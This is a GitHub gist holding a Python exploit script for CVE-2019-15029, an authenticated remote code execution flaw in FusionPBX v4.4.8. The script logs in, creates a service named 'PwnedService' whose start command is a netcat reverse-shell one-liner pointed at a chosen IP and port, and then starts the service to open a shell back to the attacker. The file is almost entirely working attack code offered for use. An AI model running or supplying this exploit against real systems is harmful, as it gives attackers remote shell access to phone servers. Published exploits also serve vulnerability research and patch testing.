/FusionPBX-exploit.py
Secret
Last active Aug 14, 2019
| #!/usr/bin/python3 | |
| ''' | |
| # Exploit Title: FusionPBX v4.4.8 authenticated Remote Code Execution | |
| # Date: 13/08/2019 | |
| # Exploit Author: Askar (@mohammadaskar2) | |
| # CVE : 2019-15029 | |
| # Vendor Homepage: https://www.fusionpbx.com | |
| # Software link: https://www.fusionpbx.com/download | |
| # Version: v4.4.8 | |
| # Tested on: Ubuntu 18.04 / PHP 7.2 | |
| ''' | |
| import requests | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
| import sys | |
| import warnings | |
| from bs4 import BeautifulSoup | |
| # turn off BeautifulSoup and requests warnings | |
| warnings.filterwarnings("ignore", category=UserWarning, module='bs4') | |
| requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
| if len(sys.argv) != 6: | |
| print(len(sys.argv)) | |
| print("[~] Usage : ./FusionPBX-exploit.py url username password ip port") | |
| print("[~] ./exploit.py http://example.com admin p@$$word 172.0.1.3 1337") | |
| exit() | |
| url = sys.argv[1] | |
| username = sys.argv[2] | |
| password = sys.argv[3] | |
| ip = sys.argv[4] | |
| port = sys.argv[5] | |
| request = requests.session() | |
| login_info = { | |
| "username": username, | |
| "password": password | |
| } | |
| login_request = request.post( | |
| url+"/core/user_settings/user_dashboard.php", | |
| login_info, verify=False | |
| ) | |
| if "Invalid Username and/or Password" not in login_request.text: | |
| print("[+] Logged In Sucssfully") | |
| else: | |
| print("[+] Error with creds") | |
| service_edit_page = url + "/app/services/service_edit.php" | |
| services_page = url + "/app/services/services.php" | |
| payload_info = { | |
| # the service name you want to create | |
| "service_name":"PwnedService", | |
| "service_type":"pid", | |
| "service_data":"1", | |
| # this value contains the payload , you can change it as you want | |
| "service_cmd_start":"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.0.1.3 1337 >/tmp/f", | |
| "service_cmd_stop":"stop", | |
| "service_description":"desc", | |
| "submit":"Save" | |
| } | |
| request.post(service_edit_page, payload_info, verify=False) | |
| html_page = request.get(services_page, verify=False) | |
| soup = BeautifulSoup(html_page.text, "lxml") | |
| for a in soup.find_all(href=True): | |
| if "PwnedService" in a: | |
| sid = a["href"].split("=")[1] | |
| break | |
| service_page = url + "/app/services/services.php?id=" + sid + "&a=start" | |
| print("[+] Triggering the exploit , check your netcat !") | |
| request.get(service_page, verify=False) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment